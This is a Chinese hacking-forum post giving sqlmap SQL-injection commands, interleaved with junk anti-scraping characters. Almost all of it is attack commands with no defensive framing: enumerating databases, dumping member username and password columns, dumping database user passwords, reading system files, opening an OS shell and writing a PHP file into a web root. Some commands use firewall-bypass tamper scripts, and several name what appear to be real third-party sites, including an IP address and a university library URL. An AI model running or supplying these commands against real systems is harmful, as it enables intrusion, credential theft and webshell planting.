找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1853|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap
( {3 f' S5 `( K$ F
( F" P) j( \6 V9 w4 q) I/ w  pupdate :::::>     in the folder   after  execute    following   order : svn update
8 [+ e" u% l% i, G6 n: F
) g7 F$ U. l" e! W9 Gsqlmap.py -r 1.txt --current-db
) F: N+ a6 W% l( o( Z- Q1 X* A  t
0 |1 k% A9 }+ r* wv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
* q0 u/ y/ L, p9 t# G' H$ v: T: u: y3 F: |- e( o) H% I
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) & b4 s; {. X8 i/ c0 E+ v, Y
猜解数据库
" w& t  g, w) a6 v" q  c./sqlmap.py -u "injection-url" --dbs
* P9 }3 \, t, n: Tsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"2 H1 U" \) l# g, a5 j: E' p

0 f4 p" [) _& u6 r猜解表名* H7 z* V! K  J3 O# C  Z! x; q
./sqlmap.py -u "injection-url" -D database_name --tables+ w7 q2 D8 N' w3 ~0 ^& z  \
0 A. i7 K5 C+ H0 x+ |4 J5 ~
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py", R* m; P7 @4 L1 R6 C
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
; L$ u/ v4 l5 \* h% X) X- a6 z8 f8 f& J6 r
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
+ r" @1 t3 n4 O) p* b2 D
9 u# E' s% e' c: C1 vsqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"% [( q# ~" P5 }) C* R9 C: e5 A) H8 k. k
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py": @6 v& P5 k9 [5 B7 i, _$ B# C
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
6 o) F/ m0 x7 L8 l  a7 {* Qsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
# d9 L$ S7 _, l( H! h
- U( ^4 K* Q8 _. s. P; O9 g* ?sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py": ?) e& R1 l( `- w& ]
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"4 `9 q& @. ^" C- `  ^
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"+ q% L7 w, Z. t
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
! d8 O. b/ o! ysqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
* M9 n3 g: J. a+ T/ p
& H+ f) u1 R6 G! E+ P- usqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
$ S0 b& l9 F2 Asqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"  d6 F4 l. f! o- L$ A0 O. y
1 ]( k% o$ a0 D! @: L; K8 V
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"" R* E! X& l$ b2 l
猜解列名1 D% I9 q8 c- n2 z+ ], I
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns6 X- x2 H  c3 G9 G6 Z6 f
4 l' B# D+ `1 p, A
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
) R7 ]' q, r# F$ asqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py" ! j* A3 X- I  G# M
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py", u! O5 t3 i2 ^, q1 Y
  T! I8 T' c1 j7 n
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"" B/ L$ Z5 h: J6 o7 k
&submit=Go
$ h$ ~4 v+ s1 v猜解值
% ]8 Q" {8 q3 J6 s./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump1 k/ H# w' v0 E' u8 @0 N
========================================================
. w$ K9 R5 }, Q8 Q  D* \) I搜索表名中包括mana字符的
# U: M1 g0 n4 Q; a  C1 |+ B& }7 G/sqlmap.py -u "injection-url" -T mana --search! U  D. w1 ~7 n) M
返回一个交互式sql shell
, a* d6 l8 k7 P3 D' D$ a& J/sqlmap.py -u "injection-url" --sql-shell
2 M- S3 z& f) ~% _# x8 F读取指定文件(需权限)( `; D: C6 V  h0 c1 ^" }  |- ?/ v
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
' J4 N+ M1 V5 c. X9 J查看当前 用户 及 数据库 + r& |' I3 p( [: T1 t+ P
/sqlmap.py -u "injection-url" --current-user --current-db/ I% X' [4 T0 c! k' u2 }
本地文件 写入 远程目标绝对路径
+ g) C- b8 j, M' M4 B0 _/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
' q1 M/ B6 M  @! s( G* Bsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
6 G$ V: w  ~$ @  I- g% a, A5 x: q2 ?. M$ o! M3 V
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
5 S% F+ b7 t6 Y) O$ v" C查看某用的权限1 A" ?; Z' |8 s1 l& I; O
/sqlmap.py -u "injection-url" --privileges -U root$ G: d* C6 H( y( j
查看当前用户是否为dba
/ F- \+ M' X' }5 S/sqlmap.py -u "injection-url" --is-dba
1 `7 [8 e# K1 ?0 k" w/ T读取所有数据库用户或指定数据库用户的密码
% {3 T* n- i$ S9 h2 W; usqlmap.py -r 1.txt --users --passwords
* {! B8 i! e" T1 Wsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
8 S2 C0 L6 k! S# `' ]9 |1 \4 }* b. W" U7 F# t5 [
/sqlmap.py -u "injection-url" --passwords -U root
. K2 K. M$ n$ u! X8 Q. D
2 R4 W; f5 Z+ a7 I9 s--start&&--stop 与 --first&&--last 的区别2 L( l1 x; |" R- V& W) F" U
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)6 Y! Y" \! S) i5 K

, V, i  c( G& `/ H% |" b$ z从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
$ V$ M" a- ^* j: A$ \# x/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables" `6 F9 W' j! I3 d
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
* `8 L* L8 t: H8 C" ^9 h- J
0 i/ H# C/ e& }* P5 d" l" N% X执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……), C0 T/ x' z, f' P2 {) F! F
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"4 L8 w# [* B. R! z1 c: q
0 ~4 E# y% N9 n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表